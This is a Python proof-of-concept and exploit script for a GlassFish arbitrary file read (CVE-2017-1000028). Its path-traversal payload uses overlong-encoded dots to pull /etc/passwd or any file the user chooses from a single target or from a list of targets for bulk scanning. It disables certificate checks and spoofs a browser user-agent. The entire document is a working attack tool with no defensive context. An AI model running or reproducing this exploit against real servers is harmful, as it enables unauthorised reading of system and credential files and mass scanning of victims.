README.md
Rendering markdown...
from bdb import checkfuncname
import urllib3
import argparse
import sys
import re
import requests
def banner():
print("CVE-2017-1000028 POC&EXP BY: NeonNOXXX");
print("TIPS:The mode -c only can be used in SingleUrl mode.");
def checkSingle(target):
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
}
payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
urllib3.disable_warnings()
try:
re = requests.get(target + payload,headers = headers,verify = False)
print('[+]Proving on target : ',target)
if re.status_code == 200 and 'root' in re.text:
print(target + ' is vulnerable.')
#print(re.text)
else:
print(target + ' is not vulnerable.')
except:
print('[-]Error.')
sys.exit(0)
#re1 = requests.get(target.strip("/") + payload,headers = headers,verify = True)
#print(re1.text)
def checkSingleText(target):
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
}
payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
urllib3.disable_warnings()
try:
re = requests.get(target + payload,headers = headers,verify = False)
print('[+]Proving on target : ',target)
if re.status_code == 200 and 'root' in re.text:
print('[+]' + target + ' is vulnerable.')
print(re.text)
else:
print('[+]' + target + ' is not vulnerable.')
except:
print('[-]Error.')
sys.exit(0)
#re1 = requests.get(target.strip("/") + payload,headers = headers,verify = True)
#print(re1.text)
def checkBunch(file):
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
}
payload = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
print('[+]Proving...')
urllib3.disable_warnings()
with open(file,'r') as f:
target = f.readlines()
for t in target:
t = t.strip('\n')
try:
re = requests.get(t + payload,headers = headers,verify = False)
if re.status_code == 200 and 'root' in re.text:
print('[+]' + t + ' is vulnerable.')
else:
print('[+]' + t + ' is not vulnerable.')
except:
print('[-]Error.')
sys.exit(0)
def checkCustom(target,custom):
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
}
payload = target + '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae' + custom
#print(payload)
urllib3.disable_warnings()
try:
re = requests.get(payload,headers = headers,verify = False)
if re.status_code == 200:
print(re.text)
else:
print('Cannot read this file.')
except:
print('[-]Error.')
sys.exit(0)
if __name__ == "__main__":
banner();
parser = argparse.ArgumentParser(description = 'GlassFish Arbitary File Reading(CVE-2017-100028)')
parser.add_argument('-u',action = "store",dest = "url",help = "Single Target URL") #action="store":仅保留参数
parser.add_argument('-ut',action = "store",dest = "url_text",help = "Output the passwd file of this Single Target URL") #action="store":仅保留参数
parser.add_argument('-f',action = "store",dest = "file",help = "Read ftom url.txt") #"Required:True":参数必需
parser.add_argument('-c',action = "store",dest = "custom",help = "Read the Custom File.") #"Required:True":参数必需
args_opt, _ = parser.parse_known_args()
args = parser.parse_args()
urllib3.disable_warnings()
if not args.url and not args.file and not args.url_text and not args.custom:
print("Please spectified one option(-h / -u URL / -uc url customfilepath / -f url.txt / -c The file you want to read.).")
sys.exit(1)
if args.url:
checkSingle(args.url)
if args.file:
checkBunch(args.file)
if args.url_text:
checkSingleText(args.url_text);
if args.url and args.custom:
checkCustom(args.url,args.custom)
#payload:/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
###